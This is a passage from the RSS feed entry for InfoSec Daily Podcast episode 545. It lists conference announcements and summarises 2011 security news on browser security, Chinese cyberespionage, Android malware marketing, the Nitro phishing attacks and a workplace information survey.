		<link>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers</link>
		<comments>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers#comments</comments>
		<pubDate>Wed, 14 Dec 2011 01:56:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3269</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 545 for December 13, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Accuvant LABS has just released some new research that compares the security of three of the most widely used web browsers &ndash; Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer. Google commissioned Accuvant to perform this comprehensive and independently designed security analysis to help advance the discussion of best practices in the security community. &nbsp;Our research findings are extremely thorough and complete, so we decided to create this blog to summarize the results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware, spyware and viruses are all too familiar to those who regularly surf the web. These malicious programs can lead to system pop-ups, slowdowns, account takeovers, credit card theft, identity theft, and the theft of personally identifiable information. While antivirus and anti-malware can help prevent an infection, the first line of defense is using a secure web browser. For a person that surfs the internet, comparing and contrasting the security of different web browsers is difficult. Marketing materials are available to the average user, but they often contain direct contradictions and the reader ends up wondering which web browser is the most secure. Our research aims to fix that problem. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We compared browsers from a layered perspective, taking into account security architecture and anti-exploitation techniques. &nbsp;&nbsp;Like antivirus or anti-malware software, each provides an additional layer of defense. The nice thing is, when anti-exploitation technology prevents an attack, anti-malware and antivirus aren&#39;t needed. The idea is that it&rsquo;s a lot easier to keep a fortress with a moat safe than it is to protect a beach shack.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Accuvant LABS has deemed Google Chrome to be the most secured against attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Associated Research Paper: </span><a href="http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online threats to organizations have shifted to a higher level this year than ever before, says a senior executive of a software security firm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I think the overall theme is what people are saying everywhere; it&rsquo;s getting serious,&rdquo; Rod Rasmussen, president and chief technology officer of Internet Identity, said in an interview. &ldquo;This is no longer fun and games or even stealing money, credit card information from someone to make a quick buck.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was one of top seven security trends Tacoma, Wash.-based </span><a href="http://www.internetidentity.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Internet Identity</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (IID) spotted during the last 12 months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IID named 2011 &ldquo;The year of the data breach&rdquo;. Everyone from Sony Corp.&rsquo;s Playstation to RSA was targeted and mass amounts of client data was lost into the wilds of the Internet. &ldquo;It&rsquo;s not ginormous like the TJ Max leak a couple of years ago but people are leaking data all over the place,&rdquo; Rasmussen said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He attributes this gain to a new black market for data stealing software. &ldquo;It&rsquo;s the commoditization, the commercialization of crimeware,&rdquo; he said. &ldquo;Anyone can get a ZeuS kit or a SpyEye.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rasmussen said cybercrime has undergone a sophistication in the last couple of years. &ldquo;There&rsquo;s a couple of different guys in the Eastern block [of Europe] that have combined and shifted around who have what source code for what,&rdquo; he said. &ldquo;New versions of these tools are coming out, with plug-ins and all kinds of stuff.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another trend is the boom in mobile malware due to the proliferation of smartphones. &ldquo;There will be far more mobile phones, or smartphones, than desktops and laptops in the near future,&rdquo; he said. This has led to a shift in focus for malware makers since mobile devices don&rsquo;t have the kind of deep security infrastructure that desktops have.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.impomag.com/scripts/ShowPR.asp?RID=20093&amp;et_cid=2372201&amp;et_rid=60868626&amp;CommonCount=0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.impomag.com/scripts/ShowPR.asp?RID=20093&amp;et_cid=2372201&amp;et_rid=60868626&amp;CommonCount=0</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As few as 12 different Chinese groups, largely backed or directed by the government there, do the bulk of the China-based cyberattacks stealing critical data from U.S. companies and government agencies, according to U.S. cybersecurity analysts and experts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The aggressive, but stealthy attacks, which steal billions of dollars in intellectual property and data, often carry distinct signatures allowing U.S. officials to link them to certain hacker teams. And, analysts say the U.S. often gives the attackers unique names or numbers, and at times can tell where the hackers are and even who they may be.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sketched out by analysts who have worked with U.S. companies and the government on computer intrusions, the details illuminate recent claims by American intelligence officials about the escalating cyber threat emanating from China. And the widening expanse of targets, coupled with the expensive and sensitive technologies they are losing, is putting increased pressure on the U.S. to take a much harder stand against the communist giant.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is largely impossible for the U.S. to prosecute hackers in China, since it requires reciprocal agreements between the two countries, and it is always difficult to provide ironclad proof that the hacking came from specific people.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several analysts described the Chinese attacks, speaking on condition of anonymity because of the sensitivity of the investigations and to protect the privacy of clients. China has routinely rejected allegations of cyberspying and says it also is a target.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Industry is already feeling that they are at war,&quot; said James Cartwright, a retired Marine general and former vice chairman of the Joint Chiefs of Staff.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A recognized expert on cyber issues, Cartwright has come out strongly in favor of increased U.S. efforts to hold China and other countries accountable for the cyberattacks that come from within their borders.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2011/12/13/microsoft_android_malware/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/13/microsoft_android_malware/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	Microsoft is offering free Windows phones to Android malware victims, providing they are prepared to tell world+dog about their problems.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The marketing stunt &#8211; already given the hashtag</span><a href="http://twitter.com/#%21/search?q=%23droidrage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">#droidrage</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Twitter &#8211; follows a run of publicity about android malware.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ben Rudolph (</span><a href="http://twitter.com/BenthePCGuy"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@BenthePCGuy</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), the Microsoft Windows Phone &quot;evangelist&quot; behind the social network ploy, is offering the five people with the worst stories free Windows smartphones as an alternative. It&#39;s unclear if the Android virus victims will be either asked or required to take part in advertising campaigns.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The marketing initiative has already attracted comment from security watchers. Graham Cluley, senior consultant at anti-virus firm Sophos,</span><a href="http://nakedsecurity.sophos.com/2011/12/13/microsoft-free-phones-android-malware-victims"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">described</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the move as a &quot;somewhat below-the-belt&quot; attempt to highlight the possible security deficiencies of Android rather than the benefits of Windows Phones.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hubristic promotion also rather overlooks the fact that the vast majority of malware samples (tens of millions against thousands on Android) only affect Windows desktops. Perhaps Microsoft is getting back at all those Apple ads from a few years back.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.pcadvisor.co.uk/news/security/3324811/industrial-espionage-gang-sends-malicious-emails-in-security-vendors-name"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.pcadvisor.co.uk/news/security/3324811/industrial-espionage-gang-sends-malicious-emails-in-security-vendors-name</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A cybercrime gang that primarily targets companies from the chemical industry has launched a new series of attacks that involve malware-laden emails purporting to be from Symantec, the security vendor responsible for exposing its operation earlier this year.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dubbed the Nitro attacks, the gang&#39;s original industrial espionage efforts began sometime in July and lasted until September. The attackers&#39; modus operandi involved sending emails that carried a variant of the Poison Ivy backdoor and were specifically crafted for each targeted company.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite being publicly exposed by Symantec in an October</span><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the gang didn&#39;t give up on its plans and, in fact, stuck to many of its techniques.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The same group is still active, still targeting chemical companies, and still using the same social engineering modus operandi,&quot; security researchers from Symantec said in a blog post on Monday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;That is, they are sending targets a password-protected archive, through email, which contains a malicious executable,&quot; they added.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The interesting aspect about the gang&#39;s new attacks is that they are using Symantec&#39;s own report in order to trick victims. One email intercepted by the security company was crafted to appear as if it were sent by its technical support department and warns recipients that many enterprise computers were infected with Poison Ivy.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.computerweekly.com/news/2240112371/Addicted-workers-risk-overdosing-on-information"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240112371/Addicted-workers-risk-overdosing-on-information</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">UK workers are addicted to accessing work-related information 24 hours a day and risk drowning in it unless their business takes steps to support the information explosion, according to a survey.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The YouGov research, commissioned by Symantec, interviewed over 1,000 office workers about their relationships with information. It analysed how businesses can create an environment that supports workers in today&rsquo;s information heavy business environment. With data at the fingertips of employees on numerous devices 24 hours a day businesses are faced with security, storage and availability challenges.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The findings reveal British workers are addicted to information that risk drowning in outdated information:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">62% access work information electronically outside of normal business hours;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">69% take company information from the office network to work from home or elsewhere;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">57% who access work information outside office hours use a personal mobile;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">21% keep e-mails and files unnecessarily because they simply don&rsquo;t have time to sort through them;</span></li>
